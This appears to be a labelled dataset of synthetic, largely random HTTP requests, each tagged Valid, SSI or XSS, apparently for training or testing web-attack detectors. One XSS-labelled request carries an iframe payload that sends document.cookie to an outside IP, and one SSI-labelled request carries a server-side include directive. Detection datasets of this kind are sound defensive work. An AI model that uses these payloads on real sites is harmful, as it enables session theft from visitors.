If-Modified-Since: Wed, 27 Oct 04 24:13:13 UTC
If-Unmodified-Since: Thu, 26 Feb 04 19:20:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 30
MIME-Version: 6.8
Pragma: no-cache
Authorization: tUmcn a4hk=n4Iui
Referer: /lNfr/nneAnr6a/efem.pl
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Ddlao1rpr (oPeiYJj@; hKP_fXH; hSkroM3fY)
UA-CPU: Sparc
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: tgIia/4.5, tqrgN/1.9, ioi/4.3
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"
----: -----------------------------

null

End - Id: 43465
Start - Id: 12316
class: Valid
GET /owcYaohs/qFTSEu7guqvHKghkz5Mb/viiies/ab6Z-Qa3/m0sy8Q7ewt_/ewdPF/tYljP2iugLWo6EZdt/d8ul@u@Jp/cg8iOvhYzovWm8h.css?esuelminsgdki=eRsehgB&mrnde=2311185&aypoke=auuxgl0VaSdu&qWiyarrxbieht3e=si&oaptp6=5201811816 HTTP/1.1
Host: 155.58.136.240:80
Connection: des7q3la
Accept: text/*;q=0.8, image/jpeg
Accept-Charset: windows-1254, cp-936;q=0.4, iso-2022-kr
Accept-Encoding: 
Accept-Language: glTiMppe-ohheheT, lmskma-Iimshm, cxzaod-ni, syoeA0-rrtswd
Cache-Control: only-if-cached
Client-ip: 95.55.218.250
Cookie: ee=907;iacsiinyrn=lfol;viexq3Hv9eLae=7;hibtse=rUC;NG5QTunionhbCV3=psccos1oatlTBTae;ecnlJgdzsp3=vmi
Cookie2: $Version="243"
Date: Wed, 16 Dec 09 05:48:14 GMT
ETag: W/"GCD6yUW4x1j1-IUU"
Expect: 100-continue
From: sRsia@elenva.st
If-Modified-Since: Mon, 06 Nov 06 22:34:14 CET
If-Unmodified-Since: Sun, 30 May 04 04:20:45 UTC
If-Match: "C@8DxEPc0@ueuOsVk"
If-None-Match: "4HYxn6mlvOgCs-9kx"
If-Range: Fri, 30 Oct 09 18:52:55 CET
Max-Forwards: 274
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic c3J0NDp0SWF0Zg==
Authorization: Digest qop=auth-int
Range: 490-230
Referer: /tlmoeRe/lnh37srr/6BiU.msf
TE: trailers,gzip,deflate;q=0.9
Trailer: Host
User-Agent: Mozilla/2.0 (X11; U; Linux i586 4.9; sy-eo; rv:5.0.2) Gecko/95909004
UA-CPU: 68000
UA-Disp: 3555,603,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4392x5610
Via: e7reT/5.0 225.54.28.188:2, FTP/2.2 171.128.244.200, 2.0 www.xcbegxh.shtml
Transfer-Encoding: compress
Upgrade: god/4.2, see0e0/3.6
Warning: 665 24.150.246.12 "aeenoduraB" 
X-Forwarded-For: 55.96.214.140
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12316
Start - Id: 21526
class: Valid
GET /Ut@e3_u@Jautoexec@H/efihibpelaaebsVouasQ/rG9beIvF_Mz1Z2k/2_.0q-up@6YANHwhbd/o02ycqn5/8R.MBj72/aIp1Mgp/Us2rsEdmVd/mM5t/tOe0.html?zlexecBEprocessing-instructionNTF=ble&erf9tthslenOHe=+processing-instructionnaccepto&intrnrtYeih=W3ehsthtpasseio2nihl&apaasoaob=895554557&trqy=8037661&euiFls9orl2w=eoj-&unionstyleAexec98=uant&3faHvvardoR=ekd&uae38lb=noo&aiOxojtt=5262786&5w4wc=t&p9YS2nullr4telnetT=eto&theod=rXV5-3&ronrapeh3i6esm=%264qt%24&iframelCD=ek0_Y5 HTTP/1.1
Host: www.sgrneb.fr
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: yonao-e, o5r1eut-nhcoh;q=0.1, FlNb-teea4f
Cache-Control: only-if-cached
Client-ip: 190.4.211.183
Cookie: lxurr1cpEolieAx=asP6gYe
Cookie2: $Version="1"
Date: Mon, 11 Sep 06 09:14:01 CET
ETag: W/"ntfELDStUc0DhxJ4BRh"
Expect: bnur
From: 2T2s@ttdsSsnEe.gov
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Sat, 09 Feb 08 12:29:48 CET
If-Match: *
If-None-Match: "JBvmlbwISQSEwpUCh"
If-Range: *
Max-Forwards: 988
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic ZnV0eGFyaW86aWVhcTE=
Authorization: ledlsl pirefrs=n3do2
Range: -6570,934358-908192
Referer: http://www.rhhg.org/adeeCal/simss.mdb
TE: trailers,gzip;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: 7ngxtOUrsltile
UA-CPU: StrongARM
UA-Disp: 974,667,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5415x3665
Via: FTP/0.0 129.197.241.24:4
Transfer-Encoding: identity
Upgrade: itf7t/2.6, csuezD/6.0, raVi/0.2, 5hi6lt/9.3
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 15490998338905562
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21526
Start - Id: 31777
class: Valid
GET /ct/vnnbrqNroeFrvt9fTa19/77Abha1wrebhshaim/etsirRrnrbsdeecak0e/1pS_r_X7uB/m4iTWrwB_vqq/unEDiHGDs0am/suneTbtmsratrsxEaoa/I3VnXkPeVC2/j4_Bio3iGsI7Ud2qol/rnnfriawr.gif? HTTP/1.1
Host: 197.0.149.136:80
Connection: close
Accept: image/gif
Accept-Charset: *
Accept-Encoding: compress, gzip, deflate;q=0.1, gzip, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 45.140.255.145
Cookie: uJahWM-=p4hOEf1H1k;V9iidt0Tms=nRn;qobnscl=aAvOSJb6;Tna= yresaupg;qed6aL=5;gOZzhd=Hdf
Cookie2: $Version="45"
Date: Sat, 14 Mar 09 05:12:35 CET
ETag: W/"z0-mxX4bAe7Wma560C"
Expect: 100-continue
From: o58tOaQr@asxayh.com
If-Modified-Since: Mon, 06 Oct 08 03:18:54 UTC
If-Unmodified-Since: Wed, 09 Jan 08 22:06:36 GMT
If-Match: *
If-None-Match: "@tilC1Y5FhXh1hG"
If-Range: Tue, 10 Jul 07 15:55:10 UTC
Max-Forwards: 653
MIME-Version: 6.8
Pragma: rwnkf6=HoE
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZmhodFQ6N3J0U2Rl
Range: 1512-
Referer: /sPyal/Arleinot.zip
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.7 (compatible; psi5edr; Linux i386; iaintt)
UA-CPU: 68000
UA-Disp: 423,7753,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0437x4847
Via: FTP/8.5 123.25.187.220, ao2tt/2.8 www.o6jmoat.jpeg:39, 7.5 24.127.102.137
Transfer-Encoding: identity
Upgrade: ybni/1.7, iatis/2.4, eyT/2.8, axs9vh/7.2
Warning: 838 153.229.81.192:1 "ewsrAvd6" 
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31777
Start - Id: 39463
class: SSI
GET /0ipfmt/vPAl.tUformuiJ7A/melttzwll8zAael2z/er9Y2o1-lQDq_dWR/o_.exe?wlhtoCirnoontd=fgrncv1uI%7C9ou&tcuTeiKwd1csa=92&HhNuue2L=select&xnl8eheh=%26r%27H&mowmn=n0k&oic=isasoRteho9oomdnhs&Ot3A3ocsctnzr5a=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&nied8tmaea=n8asom%40%5CikO&a5nrtnq=gsi&vn2nrgbsiy=dea2Iyiiellca&em3cote2se6AhWj=468740&prlnttDlPCfe=06714&dntDAi=duz0M6n3k&@abNU=s2eres&orh2iauucH=oy_9lMZD HTTP/1.1
Host: 145.13.200.95:80
Connection: close
Accept: image/gif
Accept-Charset: *
Accept-Encoding: identity;q=0.5
Accept-Language: Eeod-tTzuugSr;q=0.7, Ie-orE, wsbt-eeoaw, shr2ynTb-qpilaEte, te-saTUlo;q=0.7
Cache-Control: no-store
Client-ip: 91.67.57.209
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Cookie2: $Version="5"
Date: Sun, 30 Nov 08 06:09:28 UTC
ETag: "LhCcRWhjKnJRhPq"
Expect: ris5rtt=czils
From: a7fo@TTrA.it
If-Modified-Since: Tue, 08 Sep 09 04:51:46 GMT
If-Unmodified-Since: Wed, 25 Feb 04 03:59:06 GMT
If-Match: "t6TsBAr4@C.TVfEkYD"
If-Range: Fri, 30 Oct 09 12:03:54 GMT
Max-Forwards: 37
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Range: -2397
Referer: http://www.loteanQ.uk/oauho/e2ide.gif
TE: gzip
Trailer: Referer
User-Agent: pirFf4ia
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
UA-Color: color32
Via: FTP/9.8 www.aswaowi.html
Transfer-Encoding: compress
Upgrade: mwv/5.9, jxt9eh/8.4, lch/8.1, nSc/9.6
Warning: 920 www.sgadis2e.js "onamHixfuolaten" 
----: --------------------------------------------

null

End - Id: 39463
Start - Id: 13822
class: Valid
GET /2kncTUC.Sb6MI/mOLiZ/fX-6bFJiViT/t.jjgYc0sPZPnfid/1bEres.nsf? HTTP/1.0
Host: www.uhhMbnat.uk:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: gb2312, iso-8859-15;q=0.7, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 120.246.1.145
Cookie: eMwtra=Ars;eici1ule7nsihz=78462138;sloeEZuTboseuo=lbAWPpkG0O;TVuniondadmini4=sn1isgan6rheJ;L7linkg.Y=ef.
Cookie2: $Version="3"
Date: Fri, 04 Apr 08 21:12:51 GMT
ETag: "7O3PSdBZs8KkIEpiF"
Expect: 100-continue
From: ZsDrsgy@qEamyqe.uk
If-Modified-Since: Thu, 13 Sep 07 07:10:02 GMT
If-Unmodified-Since: Sat, 31 Oct 09 09:03:10 CET
If-Match: "5H.s6DgdsLX0MW.EZnL"
If-None-Match: *
If-Range: Sun, 20 Apr 08 04:18:12 UTC
Max-Forwards: 8
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ycrd"
Authorization: Digest cnonce="1alcn"
Range: 2-
Referer: /hvfetsTa/hndlpote/1ndib.avi
TE: deflate;q=0.3,chunked;q=0.5
Trailer: Max-Forwards
User-Agent: fHseq/5.7.5.5
UA-CPU: MIPS
UA-Disp: 804,7636,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 750x449
Via: 6.2 www.abjdri.png, HTTP/9.4 221.211.124.243
Transfer-Encoding: compress
Upgrade: qee4/7.2, h7qc/4.6, eyeEwt/7.6, 8hisz3/8.0
Warning: 666 84.76.236.184 "t0uoITqzpy2Sloui" 
X-Forwarded-For: 166.8.232.165
X-Serial-Number: 4673699275390197026
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13822
Start - Id: 23450
class: Valid
GET /4QNTHetinOS8a.c.png?lh=isg7XtaSoi&lqn=eNwomxince%3Dl&niedurtolp=csHrt+ye+q&ceai8hpygi6vy=drwrcpsno%3Fatiua%3Esi9%3Cg HTTP/1.1
Host: www.gmsasowlgh.org
Connection: oI1t7i
Accept: image/*, audio/*;q=0.6
Accept-Charset: x-mac-arabic, euc-tw;q=0.1, shift_jis;q=0.6, euc-kr, iso-8859-2
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: OwuoT='iu6tzg'
Client-ip: 146.86.154.88
Cookie: tz6tidge7n7=leF5ZWcyQ;8p6wgetK.g1T=%dropet5ogl;ioin=eaow1htC
Cookie2: $Version="551"
Date: Thu, 22 Jan 04 15:13:09 UTC
ETag: W/"wi37KR_mGFB84.svA"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Wed, 30 Jan 08 01:57:10 GMT
If-Unmodified-Since: Sun, 27 Mar 05 04:25:48 CET
If-Match: "g3nHV37mR0@0.3rw4"
If-None-Match: "ru9fPVBHivzjSJw9"
If-Range: *
Max-Forwards: 70
MIME-Version: 3.9
Pragma: c='rttmga'
Proxy-Authorization: Digest username="eru4bt"
Authorization: Digest uri=http://bUdIarge.org/po6eh11.jpg
Range: 60-4,2-51827,267858-0573
Referer: http://tl2lf4db.uk/Olzz.jsp
TE: gzip,deflate;q=0.4,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: h2yo5tad/8.1
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/9.9 www.ev4qtv.gif, 7.5 225.231.81.93
Transfer-Encoding: compress
Upgrade: brlae/8.4, ioi/7.9
Warning: 514 www.icma.htm "hi7rt2ysVtuMd6rAei" 
X-Forwarded-For: 46.39.164.236
X-Serial-Number: 15233843
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23450
Start - Id: 4906
class: Valid
POST /776e@rqinputZDjbetween-Th/Hurc3NseEcdiuTiru2X/IDF/redneeaejseaLpohtl.mdb? HTTP/1.0
Content-Length: 104
Content-Language: w,t
Content-Encoding: compress
Content-Location: /hinenu/sioe8d/eafh/TwsaoOt.gz
Content-MD5: cmJtbm5oN3lhOGFlY2VyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 07:36:20 UTC
Last-Modified: Tue, 24 Feb 09 03:51:56 CET
Host: 184.75.140.3:80
Connection: close
Accept: video/quicktime;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate, deflate;q=0.1, gzip;q=0.0, compress
Accept-Language: an1teeet-sSaobtm;q=0.2, tcvns-nzs, tenH-oasa, re-bec, jenieoe-sn;q=0.7
Cache-Control: no-store
Client-ip: 165.127.88.109
Cookie: dtSah=alrr0Leracec1Sm
Cookie2: $Version="9"
Date: Wed, 26 Dec 07 07:32:16 CET
ETag: "xx0X0EUsOXV7rKRB"
Expect: 100-continue
From: ldsl@rLaltEo.net
If-Modified-Since: Tue, 02 May 06 12:59:40 CET
If-Unmodified-Since: Tue, 19 Oct 04 09:37:33 CET
If-Match: "IYkMQexoSkuOg0gihrl"
If-None-Match: "tsT6EwmtxD3nX5hF"
If-Range: "eOnIx1MhARXbD4U3"
Max-Forwards: 082
MIME-Version: 4.1
Pragma: ado5e=9
Proxy-Authorization: NTLM dWFud2xwRU9pTmVuZXdpYWxjdHdJamR0bGVlbmllbTJrdFdmdmFsbGw=
Authorization: oto1g8 gAsnqhm=ivmai
Range: 0401-,-401,485260-5
Referer: /mEfUxS/sa4tlN/niaer.asmx
TE: trailers,deflate;q=0.0,trailers
Trailer: Date
User-Agent: Mozilla/9.4 (X11; U; SunOS sun4u 8.8; ey-ev; rv:8.9.9) Gecko/59020979
UA-CPU: x86
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5493x774
Via: HTTP/8.0 209.14.35.222, RiAsAh/5.0 www.uane.css, FTP/0.6 163.174.78.42
Transfer-Encoding: deflate
Upgrade: Inss/4.9, hae/5.8, yoTgu/3.8, aeTdb/0.2
Warning: 918 94.49.114.205 "tstiayw" 
X-Forwarded-For: 89.218.230.173
X-Serial-Number: 074898
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mplewMkaTBtsii=Ed4c q6nerDa&5JB5y2=mhDSX@FMXTAB&wBta=EbyOle8&s5hw=87&fii=1otruee1L&MAhGL=fTsuohetniksx

End - Id: 4906
Start - Id: 47857
class: XSS
GET /hahtoh/YGf9i0IeTUjTX/ipadminbOTJUFCuJs/aeAegsemcakaMtiy/ivG1x/wV/oorknurrlc78ati/hs-Uu2M09.cfm?votaVaheust3Fet=rv+e5utiaAu%3Al&sYspKd@Q@cmd=yehe&Iznbno.DmCp=rosc&03elrieSo=kVxXNjn73ISK&lEamtsssaeh=69IIl_x&ieuc1ines=%3Ciframe++++src+++%3D+%22+++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F82.96.6.203%2Fes.mspx%27%2Bdocument.cookie%29%3B%5D%22++++%3E HTTP/1.1
Host: 16.114.229.37
Connection: 1eueca
Accept: video/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: zhpqs='Elesiu'
Client-ip: 237.181.40.228
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Wed, 20 Aug 08 06:25:50 CET
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 27 Mar 06 14:19:27 GMT
If-Unmodified-Since: Wed, 10 Aug 05 18:50:52 CET
If-Match: "s52Zv4L01-S3.8qO2C2"
If-None-Match: *
If-Range: Fri, 20 Jul 07 05:27:58 CET
Max-Forwards: 367
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest opaque="dafoil"
Range: 595606-7,222673-07
Referer: http://www.ioeuo.gov/Nnibeasm/qTn0/raieae/q6L5/Iuhrrat.css
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (X11; U; Linux i586 3.7; ct-O9; rv:2.4.6) Gecko/40999651
UA-CPU: x86
UA-Disp: 4309,162,32
Via: 0.1 www.t0twn.htm:049
Transfer-Encoding: gzip
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 188.24.5.207
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47857
Start - Id: 24291
class: Valid
GET /pw7tTieEo/bp/iyyAtTtoSbtyEhth/ot3c/Yr3ENPbetweenZQnI/n8/t2BcHnz/lsbon/IyaseLpiatmt8f5un.cfm?ynetns=ioausume&yahqi2Ddbah=91690&DlibBinputOLNXls=%2Fef&y75Shtacces=L2nhdosatrrmc&ao5nulfe=t%3Ercmd%5B&O4usrgZFM5=iPiFGKgS-tK2 HTTP/1.1
Host: www.sctmodflt.ch
Connection: qimHVaor
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: tBjzr=bee
Client-ip: 123.201.157.28
Cookie: nJYgowmpeeode=eee9eHgtynhbe
Cookie2: $Version="488"
Date: Sun, 21 Feb 10 12:33:47 UTC
ETag: "9MdykHut-67CUwu7k.9"
Expect: tbase
From: somsctd@slielEozga.ch
If-Modified-Since: Mon, 05 Jun 06 15:10:18 CET
If-Unmodified-Since: Mon, 26 Apr 04 02:58:03 GMT
If-Match: *
If-None-Match: *
If-Range: "t1BFL3-HGgVeBjgbceq0"
Max-Forwards: 71
MIME-Version: 6.8
Pragma: astlot=if
Proxy-Authorization: Digest qop=auth-int
Authorization: fencLo lXei8mfl=s8salpol
Range: -1827
Referer: http://www.eaija.cz/nsigvko/estilhz/Roipw/yest0.pl
TE: gzip,trailers
Trailer: User-Agent
User-Agent: ptidt8/3.0.3.9.5
UA-CPU: 68000
UA-Disp: 298,2498,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 982x566
Via: 0.7 53.221.71.182:0, FTP/0.8 92.149.34.27, FTP/8.7 212.220.28.53
Transfer-Encoding: identity
Upgrade: 8hrah/0.7, 0smeTf/8.6, bnhw/9.3, jKiNhE/8.3, dkaoOi/9.1
Warning: 494 13.80.115.26:79 "esgjTrwOnjs" "Wed, 07 Oct 09 24:18:13 UTC"
X-Forwarded-For: 86.231.25.73
X-Serial-Number: 21325127322802331
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24291
Start - Id: 12941
class: Valid
GET /F@@kHUtmpvS5zUOwD/arUn.UH-xAHA4NJeq_M6/8y/le/sku/taPx/7dssfdlhMeZhisoegkg/Id/shyils3omeabnIwdireh.png?lae9ubpofeoSn0=nrq&a5hsaetpesF=isHtd7dzu0Qm&jtedoe=a1hDuOxau&8veec=eqzPQ8ZHw-&Arape9na7mw2xne=rr3&nofgcfotar=sgK3WiRnd&ebnt3piblh=unionttf4dFtoTemT%28di+5h&74JE4=+&4l=auhiiUa&rctintwAsapl=rYL&scEebw3enlO5=89&a8tbnoS2anncna4=lIjxw_rcen&PVkS-5iJ5JB=t&idc6lg047fnaic=tmp+%29d4tnr%7Cb7neo&zsi7uMhfnrtoTrl=etmphsuirwtarht HTTP/1.0
Host: www.aexViOn.uk
Connection: close
Accept: text/plain, audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 97.163.108.195
Cookie: errcJomo62tS=vWvWq;soraAdunss=4854;alafrOgwyq=otdO4ohono;xeaaea2en=80;aa=ce4 NePx4includee<
Cookie2: $Version="97"
Date: Tue, 24 Feb 09 18:57:56 CET
ETag: W/"i1yF.eyf4zILE.k"
Expect: ihGd9=n13TTc
From: ycigr@ecatIe.it
If-Modified-Since: Fri, 28 Oct 05 02:48:34 GMT
If-Unmodified-Since: Sat, 28 Aug 04 11:55:23 GMT
If-Match: "fuG7tJANn4WAD@i"
If-None-Match: "wBOLpJhu9wU-nxI4"
If-Range: "D8QRHHfLUmJyVXM-uhX"
Max-Forwards: 828
MIME-Version: 7.7
Pragma: ua='1sWeidn'
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: Basic ejRzYXJ3ZWQ6TnV1UjQ1Y2w=
Range: 9-2865,4-
Referer: http://Tzgt.de/bsir.mpg
TE: trailers
Trailer: If-Range
User-Agent: aiFEQJ5 http://www.lnsLhee.fr
UA-CPU: Sparc
UA-Disp: 2455,8800,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3851x1864
Via: wu9Ar/5.5 www.Toee.png, 5.6 www.ezasct.shtml
Transfer-Encoding: deflate
Upgrade: deie/0.6, rtumhr/9.8
Warning: 366 www.utrawot.html "Enahhagtdtdshfheg" "Wed, 29 Nov 06 11:34:27 CET"
X-Forwarded-For: 29.49.155.233
X-Serial-Number: 194126085
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 12941
Start - Id: 27308
class: Valid
GET /b9woXioro/stVHFJiN_V@/Re7OSdzRrsp/igE@Ouh@QgowVMHM/pZQH@m7r/tuheatorthsch/pO09s/eM6eYHZgSqH9BjTMooQz.php4?Flnls=hnN8uOFOa&tstesp4hy=sntGn&RJFT-Bdn5betweenb=ggegl&lbaz2a=ee9 HTTP/1.0
Host: www.qpE3Cwct.de:80
Connection: iSlmca
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.9, gzip;q=0.7, compress;q=0.7, gzip;q=0.7
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 201.241.99.41
Cookie: olihsncrpwN=cyi(t;elbHt9ltstyetse=ratesrEsA4nt;ll=5160409885;qdn=o;iqioeIzumnoem=008670817
Cookie2: $Version="439"
Date: Thu, 31 Dec 09 18:08:48 CET
ETag: "nCDwv1qbOszHO5ImF"
Expect: Rledodw
From: 0alar@rjtiat6e.uk
If-Modified-Since: Sat, 14 May 05 23:39:24 GMT
If-Unmodified-Since: Sun, 13 Mar 05 06:28:13 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Jan 04 05:02:05 UTC
Max-Forwards: 17
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic b3RlbGVlOkJoZW9lcXNx
Authorization: anehw sOnedav=ykta
Range: -49505
Referer: http://www.YleUiio.fr/nas3yaue/ighNC.html
TE: gzip,trailers
Trailer: Via
User-Agent: nzFu8lB- http://www.cTfaAr.gov
UA-CPU: x86
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0262x201
Via: 8.2 www.poua1.png, dw2okp/3.4 218.202.155.154
Transfer-Encoding: hssa
Upgrade: eyr/6.9
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 50.59.239.169
X-Serial-Number: 75164077038098175
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27308
Start - Id: 27557
class: Valid
GET /A9dVIJis-/aidS9Duhymn3lhdvis/varJDp.cfm?ogn3q=ti5tguui&ihtelsAuiset=e&onEytqtv3=r2S7%40JON&taihbsC=3soot%27W%26nns&AsrtsbGlrm=471&p2tmnvTareieioS=f2r%24En&Leauod2Ynnemow=ipw HTTP/1.0
Host: 201.100.194.72
Connection: r3MI
Accept: application/*, application/zip;q=0.2, audio/x-wav
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: tGsR0a-Tadlv8, hi-rssx;q=0.0, ceaxsce-1nsti, Erueji-8i9Tk
Cache-Control: only-if-cached
Client-ip: 43.118.104.43
Cookie: etljx=3a7UmmtbOL;n6errjs=copye;en=aZ1O-xnJwnd;GLLN02A=76382;ruoavc9btpt1bw=npe;H1A0fl=eiaana >uip0dmner ne
Cookie2: $Version="6"
Date: Fri, 16 Jan 09 13:51:27 CET
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Sun, 26 Jun 05 08:09:05 GMT
If-Unmodified-Since: Fri, 09 Jan 09 10:56:53 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 31 May 04 01:20:46 CET
Max-Forwards: 557
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: NTLM b2J0QWVhb2Fpcm9NdXNpZGdlVGM5ZXlnOWQybnJBemFO
Range: 85626-
Referer: http://lbea.fr/eese/er9Jm/dylgaru/itnqoe/i4ea.asmx
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: 0zRnt2t (l9J5gw)
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: 4.0 165.103.120.223, AYdad/4.4 119.234.153.218, 9.1 96.36.241.94
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 039 www.arkr.tiff:90 "Gazauhqtpdrsdhhh" "Sat, 20 Feb 10 16:03:50 GMT"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27557
Start - Id: 8544
class: Valid
GET /5lostaOsabez.asp? HTTP/1.0
Host: www.ehhyo4n.net:80
Connection: close
Accept: text/*;q=0.1, video/mpeg;q=0.7, audio/*
Accept-Charset: utf-7, windows-1253
Accept-Encoding: deflate, compress;q=0.9, gzip, deflate, deflate
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 215.104.92.124
Cookie: xiNAb=48;mAiaw=8356580;oId9pnha1t4faIg=99680040
Cookie2: $Version="667"
Date: Wed, 27 May 09 05:23:17 GMT
ETag: "q9bMtlh2lKLGSZQOChx"
Expect: 100-continue
From: gtmlhhzh@7orj4ow2.net
If-Modified-Since: Mon, 28 Jul 08 12:51:29 UTC
If-Unmodified-Since: Thu, 16 Jul 09 13:24:48 CET
If-Match: *
If-None-Match: "cusB0vYgx@BcVf3VswBz"
If-Range: "sW3QDC_cRzB@Toca1qa"
Max-Forwards: 60
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM NTR0RWw4bmhpYmE3YW9zYTJlZXR0dGFyaE14bXJvbkNuaA==
Authorization: Basic b2dlcmQ6a2ZmaA==
Range: 288-033,80242-026
Referer: /cetfpxE/taaetfa6/euspnio/iel8i.pdf
TE: trailers,trailers,deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: i5ttaad/8.6.5.4
UA-CPU: Sparc
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 108x957
Via: HTTP/4.5 190.121.252.249, 5.4 121.50.149.23:33668, aEirjg/5.2 www.P1a6.htm
Transfer-Encoding: qnesbn; uCotEtqa=Utpgnlpt
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 954 www.Aeczdero.html "qhsttduphEhten3esix" 
X-Forwarded-For: 188.45.28.105
X-Serial-Number: 64710408
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8544
Start - Id: 20840
class: Valid
